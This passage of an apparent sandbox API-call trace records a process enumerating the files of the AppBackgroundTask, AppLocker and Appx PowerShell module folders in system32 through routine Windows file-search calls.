nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f77330 [0286.555] FindNextFileW (in: hFindFile=0x25b73f77330, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.556] FindNextFileW (in: hFindFile=0x25b73f77330, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0286.556] FindNextFileW (in: hFindFile=0x25b73f77330, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0286.556] FindNextFileW (in: hFindFile=0x25b73f77330, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0286.556] FindNextFileW (in: hFindFile=0x25b73f77330, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0286.556] FindNextFileW (in: hFindFile=0x25b73f77330, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0286.556] FindClose (in: hFindFile=0x25b73f77330 | out: hFindFile=0x25b73f77330) returned 1 [0286.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.556] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.556] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f76850 [0286.557] FindNextFileW (in: hFindFile=0x25b73f76850, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x25b73f76850, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x25b73f76850, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x25b73f76850, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x25b73f76850, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x25b73f76850, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.557] FindClose (in: hFindFile=0x25b73f76850 | out: hFindFile=0x25b73f76850) returned 1 [0286.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.557] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d0f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.557] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d620 | out: lpFileInformation=0x653ef8d620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0286.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.558] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d070, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.558] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8d2a0 | out: lpFindFileData=0x653ef8d2a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f77bd0 [0286.558] FindNextFileW (in: hFindFile=0x25b73f77bd0, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.558] FindNextFileW (in: hFindFile=0x25b73f77bd0, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0286.558] FindNextFileW (in: hFindFile=0x25b73f77bd0, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0286.558] FindNextFileW (in: hFindFile=0x25b73f77bd0, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0286.558] FindNextFileW (in: hFindFile=0x25b73f77bd0, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0286.559] FindNextFileW (in: hFindFile=0x25b73f77bd0, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0286.559] FindClose (in: hFindFile=0x25b73f77bd0 | out: hFindFile=0x25b73f77bd0) returned 1 [0286.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.559] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0286.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.559] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0286.559] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f769d0 [0286.560] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.560] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0286.560] FindNextFileW (in: hFindFile=0x25b73f769d0, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0286.560] FindClose (in: hFindFile=0x25b73f769d0 | out: hFindFile=0x25b73f769d0) returned 1 [0286.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.560] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0286.560] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f77e70 [0286.560] FindNextFileW (in: hFindFile=0x25b73f77e70, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.561] FindNextFileW (in: hFindFile=0x25b73f77e70, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0286.561] FindNextFileW (in: hFindFile=0x25b73f77e70, lpFindFileData=0x653ef8d200 | out: lpFindFileData=0x653ef8d200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.561] FindClose (in: hFindFile=0x25b73f77e70 | out: hFindFile=0x25b73f77e70) returned 1 [0286.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.561] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d0f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0286.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.561] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d620 | out: lpFileInformation=0x653ef8d620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0286.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.561] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d070, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0286.561] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x653ef8d2a0 | out: lpFindFileData=0x653ef8d2a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f77270 [0286.562] FindNextFileW (in: hFindFile=0x25b73f77270, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.562] FindNextFileW (in: hFindFile=0x25b73f77270, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0286.562] FindNextFileW (in: hFindFile=0x25b73f77270, lpFindFileData=0x653ef8d260 | out: lpFindFileData=0x653ef8d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0286.562] FindClose (in: hFindFile=0x25b73f77270 | out: hFindFile=0x25b73f77270) returned 1 [0286.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.562] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0286.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.562] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0286.563] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", 